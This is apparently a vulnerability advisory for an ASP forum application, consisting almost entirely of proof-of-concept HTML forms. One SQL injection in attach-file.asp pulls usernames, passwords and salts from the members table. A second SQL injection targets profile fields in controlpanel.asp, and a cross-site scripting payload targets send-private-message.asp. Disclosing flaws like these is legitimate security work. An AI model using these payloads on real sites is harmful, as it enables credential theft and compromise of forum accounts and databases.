Original Advisory: http://bugreport.ir/index.php?/37
1. Exploits/POC:

1.1. "/forums/attach-file.asp" SQL Inection POC:
-------------
    <form ENCTYPE="multipart/form-data" method="post" action="http://[Site URL]/forums/attach-file.asp?action=postupload&amp;mid=[YOUR MSG ID]&amp;attachmentid=1 or 1=convert(int,(select top 1 username%2bpassword%2bsalt from members where username<>''))">
    File : <input type='file' name='attachment' size='40'>
    <br />
    <input type='submit' value='Submit'>
    </form>
-------------
1.2. "/profile/controlpanel.asp" SQL Injection POC:
-------------
    <form method='post' name='updateprofile' action='http://[Site URL]/profile/controlpanel.asp'>
    Injection1 (Numeric Update):<input type="text" name="invisible" value="1" />
    <br />
    Injection2 (Numeric Update):<input type="text" name="timeoffset" value="1" />
    <br />
    <input type="hidden" name="action" value="updateinfo" />
    <input type="hidden" name="showemail" value="1" />
    <input type="hidden" name="usesignature" value="1" />
    <input type="hidden" name="viewsignature" value="1" />
    <input type="hidden" name="disablepostcount" value="1" />
    <input type="hidden" name="userichedit" value="1" />
    <input type="hidden" name="emailnotifications" value="1" />
    <input type="hidden" name="sendprivatenotifications" value="1" />
    <input type="hidden" name="includebody" value="1" />
    <input type="hidden" name="language" value="1" />
    <input type="hidden" name="disallowbroadcasts" value="1" />
    <input type="hidden" name="viewavatars" value="1" />
    <input type="submit" />
    </form>
-------------
1.3. "send-private-message.asp" XSS POC:
-------------
    <form action="http://[Site URL]/send-private-message.asp" method="post">
    <input type="hidden" name="action" value="post" />
    <input type="text" name="toid" value="<script>alert('XSS')</script>" />
    <br />
    <input type="submit" name="" value="submit" />
    </form>
-------------